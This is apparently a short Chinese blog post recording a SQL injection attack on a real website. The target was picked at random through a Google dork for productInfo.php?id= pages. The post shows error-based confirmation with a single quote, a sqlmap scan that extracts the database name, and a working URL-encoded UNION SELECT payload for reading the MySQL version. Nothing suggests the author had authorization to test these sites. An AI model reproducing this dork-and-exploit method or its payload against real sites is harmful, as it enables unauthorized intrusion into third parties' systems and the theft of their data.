一次SQL隱碼攻擊實戰記錄

smileleooo發表於2024-04-07

一、在Google瀏覽器用inurl搜尋語法尋找目標

inrul:productInfo.php?id=

二、隨便點開幾個連線,目標出現了

image

給id引數加單引號',頁面不正常了,在上方還出現了查詢報錯的相關資訊,相關資訊還給出了資料庫是MySQL。

image

三、使用sqlmap進行掃描

image

經過小小的等待,有收穫了,爆出了資料庫名。

image

根據sqlmap的給出paylaod可以進行SQL隱碼攻擊,改變concat函式的引數就可以了手工利用了,如下payload可以爆出資料庫版本:

-8444%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(VERSION(),0x41756942736671524472427366534f54644f42527170684356664c43775571656253554978616557,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL--%20-

concat函式的三個引數都是可以回顯利用的。

image

到這裡SQL隱碼攻擊已經完成了,點到為止。


若有錯誤,歡迎指正!o( ̄▽ ̄)ブ

相關文章